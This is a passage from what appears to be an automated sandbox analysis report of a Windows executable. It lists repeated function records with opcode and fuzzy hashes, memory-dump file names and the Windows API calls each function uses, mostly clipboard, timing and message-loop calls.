                            • Opcode Fuzzy Hash: 73b0f37b6f02e5afe8cf56d241888f1de2d3c366cb277924af796cbc806a7a94
                            • Instruction Fuzzy Hash: D8915F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB99876F5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: ca2d6519b11996094eb62fafde7eae2de2630e304b99d0ec4b61303dbb7a32d7
                            • Instruction ID: c1c7a490ba5936da000e8cbc65d05fd6543ed9651093724fdbb22e94161e3dc1
                            • Opcode Fuzzy Hash: ca2d6519b11996094eb62fafde7eae2de2630e304b99d0ec4b61303dbb7a32d7
                            • Instruction Fuzzy Hash: 17915F32605B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 915cc80121fb8e8460731fb8beda464cf53dc51fd9e1e9c32a33dd49a41f961c
                            • Instruction ID: f888a90c12bb08413379ae0879264dd92507e0756705a6b2cf353b325c48ec5c
                            • Opcode Fuzzy Hash: 915cc80121fb8e8460731fb8beda464cf53dc51fd9e1e9c32a33dd49a41f961c
                            • Instruction Fuzzy Hash: FC916132205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB59876F5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$PrivateProfileStringWrite$ClipboardCloseFullGlobalMessageNamePathPeekUnlock
                            • String ID:
                            • API String ID: 2214806735-0
                            • Opcode ID: 966e0993e251eaab8a761ad261f35bb8740b10a1c5128658e6b7ccaa778617d1
                            • Instruction ID: 2e3052dcf0d27e37a79f89631188c073dc4a74c26fbb69354124884f2251c6f8
                            • Opcode Fuzzy Hash: 966e0993e251eaab8a761ad261f35bb8740b10a1c5128658e6b7ccaa778617d1
                            • Instruction Fuzzy Hash: 86915032205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB59476F5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$Thread$ChildClassClipboardCloseEnumGlobalInfoMessageNamePeekProcessUnlockWindowWindows
                            • String ID:
                            • API String ID: 3620957724-0
                            • Opcode ID: e525d7bbc95ee876222f247fdba3ef16b200ad652669fde492669ba196d2d857
                            • Instruction ID: 930ed0c1023b11d10ec1070840b1e9e8afdbedf06dc6275164a1791bf2e5dcf2
                            • Opcode Fuzzy Hash: e525d7bbc95ee876222f247fdba3ef16b200ad652669fde492669ba196d2d857
                            • Instruction Fuzzy Hash: D4916F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 5521f8c73ab6f687f7b364934b9123e8d0ba7e589e2c8c33a0d0d7c8b35b713f
                            • Instruction ID: fa76f1e41b59f4f5085c3995a3b95319f6da1b80c2ab1a12f110fa25c5c79e04
                            • Opcode Fuzzy Hash: 5521f8c73ab6f687f7b364934b9123e8d0ba7e589e2c8c33a0d0d7c8b35b713f
                            • Instruction Fuzzy Hash: 2B916F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C741
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 691aa5881b52be05bfc7c6dd34b27711e293c7c04838bb49bd9c39510eea3f31
                            • Instruction ID: 0330c350dcb3370d79b30587a84c475e003a728f4b72bf3e8d139f0c63bc47ac
                            • Opcode Fuzzy Hash: 691aa5881b52be05bfc7c6dd34b27711e293c7c04838bb49bd9c39510eea3f31
                            • Instruction Fuzzy Hash: 2C916F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekRectUnlockWindow
                            • String ID:
                            • API String ID: 1900757344-0
                            • Opcode ID: 3fedac06c96fe0384ca4b98b5effc49122582b86d66ccfd62ecd7f0a2551abfb
                            • Instruction ID: 167198eaf43535dc6ed42d9b65a573ab203947f0260dd1b76ec50b66d701c9e2
                            • Opcode Fuzzy Hash: 3fedac06c96fe0384ca4b98b5effc49122582b86d66ccfd62ecd7f0a2551abfb
                            • Instruction Fuzzy Hash: D5916F32205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 14a1b90f6deac4f37833dcb980ec153e8a0b425d2c144e3d5ce9291e422aec63
                            • Instruction ID: ab592efdaf8b961dd773a833f588af74de7c1b7b115bbfb0ee371845e1c37c7c
                            • Opcode Fuzzy Hash: 14a1b90f6deac4f37833dcb980ec153e8a0b425d2c144e3d5ce9291e422aec63
                            • Instruction Fuzzy Hash: BD916132205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB99476F5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 111943ff7495a3cbf6b3982680ea8fb40b0a81d4bc98d824b0129cf8b5a89b4d
                            • Instruction ID: 0b72f5d55827f1b54b2b187232eac8efbeb0913775c11e468b83baa82e10e95a
                            • Opcode Fuzzy Hash: 111943ff7495a3cbf6b3982680ea8fb40b0a81d4bc98d824b0129cf8b5a89b4d
                            • Instruction Fuzzy Hash: B8916F32205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlockwcsncpy
                            • String ID:
                            • API String ID: 3258626421-0
                            • Opcode ID: 35a46504e7700142afa45c779c4f3af919320cc5ad64bd5e42c719824d66ae38
                            • Instruction ID: a945119d2551b7416cd6bc3befe89842b3a5641019a7341cd0cd17fd01f8e6bf
                            • Opcode Fuzzy Hash: 35a46504e7700142afa45c779c4f3af919320cc5ad64bd5e42c719824d66ae38
                            • Instruction Fuzzy Hash: A4915032205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB59476F5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: a007a2a408687f9487b831d9485a07a67b51783b9008b2de7d8779fbbed4160d
                            • Instruction ID: d0525a5d4f71d4fb2415e92aea7ac0f7d525be29a20f60233c191e911e304a20
                            • Opcode Fuzzy Hash: a007a2a408687f9487b831d9485a07a67b51783b9008b2de7d8779fbbed4160d
                            • Instruction Fuzzy Hash: F0915032205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB59476F5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: b5d317aa164714858a996f2847591bfbc86cbe31d4ca03bc69ca62310b56ccc2
                            • Instruction ID: 07eefa78f9c7b21627365e5b993660bfdc319645098274bb9be06cfcc4bcb8d1
                            • Opcode Fuzzy Hash: b5d317aa164714858a996f2847591bfbc86cbe31d4ca03bc69ca62310b56ccc2
                            • Instruction Fuzzy Hash: 7C817032605B4086FB6B8B27E8947EA37A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: ba47faa52f61d1a6c298c8f5faee011ae2575060e31064b7a1943995185ee55c
                            • Instruction ID: e901d4af2f12c7d52fc653d81f57f544f79ea35346a68133ffd8ba4b9afa5326
                            • Opcode Fuzzy Hash: ba47faa52f61d1a6c298c8f5faee011ae2575060e31064b7a1943995185ee55c
                            • Instruction Fuzzy Hash: 39816132205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$Close$ClipboardCreateErrorGlobalHandleLastMessageMutexPeekProcessThreadUnlockWindow
                            • String ID:
                            • API String ID: 4284707085-0
                            • Opcode ID: abab58e33397804e7ca832c9cec14a5634ff7a8bf431317acd29c962a879c5de
                            • Instruction ID: d78d864a8fb7317adcc8efcde7875a8835dc1b9b714ef9cc0c0d3126ce129f33
                            • Opcode Fuzzy Hash: abab58e33397804e7ca832c9cec14a5634ff7a8bf431317acd29c962a879c5de
                            • Instruction Fuzzy Hash: B9817132605B4086FB6B8B27E8947EA37A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$Close$ClipboardCreateErrorGlobalHandleLastMessageMutexPeekProcessThreadUnlockWindow
                            • String ID:
                            • API String ID: 4284707085-0
                            • Opcode ID: 641e2052bc6f952e362d3f81701144c101028e716ef370a831786f467867b599
                            • Instruction ID: 2b04464fbb2ccf9b4f66e093a80550d5a897be58982393dfbf5d4f8799554d6c
                            • Opcode Fuzzy Hash: 641e2052bc6f952e362d3f81701144c101028e716ef370a831786f467867b599
                            • Instruction Fuzzy Hash: 71818232605B4086FB6B8B27E8947EA37A1F74DBE4F540116EB5987AF5CB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 8957dc32085d417736f4e2f17010cb25067ef12b609390843b72179b89f7ddce
                            • Instruction ID: dd3a3e0e5562110f650620b503a10697ef5710b1546decce0d06356b656f45b3
                            • Opcode Fuzzy Hash: 8957dc32085d417736f4e2f17010cb25067ef12b609390843b72179b89f7ddce
                            • Instruction Fuzzy Hash: DF816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
